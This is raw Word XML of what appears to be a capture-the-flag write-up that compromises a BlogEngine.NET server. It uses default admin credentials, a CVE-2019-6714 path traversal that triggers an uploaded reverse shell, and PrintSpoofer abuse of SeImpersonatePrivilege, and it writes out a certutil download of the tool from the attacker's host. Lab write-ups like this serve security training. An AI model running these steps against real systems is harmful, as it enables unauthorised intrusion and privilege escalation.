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Blog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1a29x2lwxes"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11500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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the number of services returned in the Nmap output, we can see that this is a Windows machine. However, we will initially focus our attention on the web service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17900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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observe that it is a blog and, after examining the page, we identified the name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“BlogEngine”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. BlogEngine is an open-source blogging platform.</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4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using the default credentials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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we were able to access the blog as an administrator.</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83000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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5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accessing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"about"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section, we were able to identify the exact version of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BlogEngine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5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searching for vulnerabilities in this version, we found the exploit below:</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CVE-2019-6714</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= 3.3.6 Directory Traversal RCE</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BlogEngine.NET</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">CVE-2019-6714 - webapps exploit for ASPX platform</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https://www.exploit-db.com/exploits/46353</w:t>
        </w:r>
      </w:hyperlink>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explained in the exploit, it is necessary to create a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostView.ascx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing our reverse shell. The file is available at the link below, so we only need to modify the IP address and port if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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uploading and saving the file by accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/app/editor/editpost.cshtml </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we need to access it via a path traversal using the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?theme=../../App_Data/files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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3136900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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2832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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6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5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accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?theme=../../App_Data/files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">through Path Traversal exploitation, we successfully obtained a shell.</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6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the user flag by accessing the root directory.</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6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in order to obtain our final flag. For that, we will need to escalate to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executing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /priv </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which will return information about the user, group, and privileges for the currently logged-in user on the local system.</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6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something relevant here, specifically the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 privilege.</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Speaking about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 (Impersonate a Client after Authentication), it was introduced in Windows 2000 SP4. Users assigned this privilege include members of the device’s local administrators group and the device’s local service account. In addition to these users and groups, the following components also have this user right: services started by the Service Control Manager’s COM (Component Object Model) servers, initiated by the COM infrastructure and configured to run under a specific account.</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identified the types of users who have this privilege, it is crucial to understand the advantages associated with it. When a user is granted the SeImpersonatePrivilege, they are authorized to execute programs on behalf of another user to impersonate a client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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bdoyjjbw9naa" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalating Privileges Using PrintSpoofer</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of the primary tools frequently used to abuse this privilege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 is known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrintSpoofer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E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/itm4n/PrintSpoofer</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tool is relatively recent, but the technique it uses to elevate access is old. To understand how this tool exploits SeImpersonatePrivilege, it is necessary to examine the access granted by this privilege.</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privilege allows users to create a process with another user’s access token. Therefore, PrintSpoofer exploits it to escalate overall access.</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proceed by downloading this tool and uploading it to the target machine.</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certutil.exe -urlcache -split -f http://&lt;ip-vpn&gt;/PrintSpoofer64.exe C:\Windows\Temp\PrintSpoofer64.exe</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5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the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrintSpoofer64.exe -i -c cmd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to obtain a privileged shell.</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5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access the desktop of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user and retrieve our final flag.</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17900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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E">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1"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3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Blog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yperlink" Target="https://github.com/itm4n/PrintSpoofer" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.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3.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20.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/46353" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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uEKMSnJEu+KhNr531gA8OuaeQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmYxYTI5eDJsd3hlczIOaC5iZG95ampidzluYWEyDmguMTc1ZjVjczk0ejBvOAByITE0SXRVZGp3eFlvY2dCT0w1dlNiRlpGRUZWbEhHWVBmUA==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